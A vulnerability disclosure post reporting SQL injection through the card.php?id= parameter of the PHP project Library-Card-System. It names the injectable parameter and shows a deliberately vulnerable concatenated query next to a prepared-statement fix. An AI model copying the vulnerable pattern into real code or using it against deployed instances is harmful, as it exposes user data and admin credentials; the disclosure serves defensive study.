Hi All,
I am Maloy Roy Orko.
Recently, during one of my pentest research sessions, I found Library-Card-System by Needyamin, which is an open source E-commerce application written in native PHP.
Curious to explore its functionalities, I downloaded and set it up in my local system.
After fiddling with the source code, I found that it did not have any kind of SQL injection protection.
This puts user data at risk: an attacker can leak the database, and the admin panel credentials are exposed as well.
The main point is that anyone without an IT background who deploys this template inherits this vulnerability, and their company's reputation can suffer too. That is why I am trying to inform everyone about this.
- Title of the Vulnerability: Needyamin | Library-Card-System 1.0 | card.php?id= SQL Injection | Found By Maloy Roy Orko
- Vulnerability Class: SQL Injection
- Product Name: Library-Card-System
- Vendor: https://github.com/needyamin/
- Vulnerable Product Link: https://github.com/needyamin/Library-Card-System/
- Technical Details & Description: The application source code is written in a way that allows SQL injection. This puts user data at risk: an attacker can leak the database, and the admin panel credentials are exposed as well.
- Product & Service Introduction: Library-Card-System
Observation & Exploitation:
- Let's look at the source code.
- You can see that there is no defense or filter against SQL injection. The code simply reads the id from the request and then fetches the matching data from the database with it.
- So how did I exploit it? What is the exploitable parameter here?
- That is: card.php?id=
- Let's take an example and then see the exploit in use.
- Vulnerable location:
- http://192.168.0.100:8080/libb/card.php?id=40+exploit
- Now let's see the approach and the result.
- My exploit for this information disclosure (a UNION SELECT injected through the id parameter):
Guess what?
It is clearly a SQL injection vulnerability.
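As an added illustration (not code from the Library-Card-System repository), here is the pattern described above in PHP: the concatenated query that makes card.php?id= injectable, next to a hardened version that validates the id and uses a prepared statement. The table name `cards`, the columns `id`/`name`, and the connection values are assumptions.

```php
<?php
// Added example (not the project's code): reconstructs the pattern the
// write-up describes, a card id read from the query string and spliced
// straight into the SQL text, next to a hardened version. The table and
// column names (cards, id, name) and the connection values are assumptions.

// Vulnerable pattern: whatever arrives in ?id= becomes part of the query,
// so a closing quote followed by UNION SELECT rewrites the statement.
function fetch_card_vulnerable(mysqli $conn, string $rawId): ?array
{
    $sql = "SELECT * FROM cards WHERE id = '" . $rawId . "'"; // no validation, no binding
    $res = $conn->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened version: enforce the expected type, then pass the value as a
// bound parameter so the database never parses it as SQL.
function fetch_card_safe(mysqli $conn, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {        // id must be a non-negative integer literal
        return null;
    }
    $id = (int) $rawId;
    $stmt = $conn->prepare("SELECT id, name FROM cards WHERE id = ?");
    $stmt->bind_param("i", $id);     // "i" = integer placeholder
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

// Request handling for card.php (assumed connection values).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = new mysqli("localhost", "dbuser", "dbpass", "library");
$conn->set_charset("utf8mb4");

$card = fetch_card_safe($conn, $_GET['id'] ?? '');
if ($card === null) {
    http_response_code(404);
    echo "Card not found";
} else {
    // Escape on output too: the injected values in this write-up were HTML aimed at the page.
    echo htmlspecialchars($card['name'], ENT_QUOTES, 'UTF-8');
}
```

A quick check for the fix is that a request such as `card.php?id=40'` now returns 404 instead of a database error or a UNION result, while `card.php?id=40` still returns the card.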
Conclusion:
The main aim of this article is to show that anyone without an IT background who deploys this template inherits this vulnerability, and their company's reputation can suffer too. But I also hope that it helps to give you ideas of how combining attacks can make them much more potent.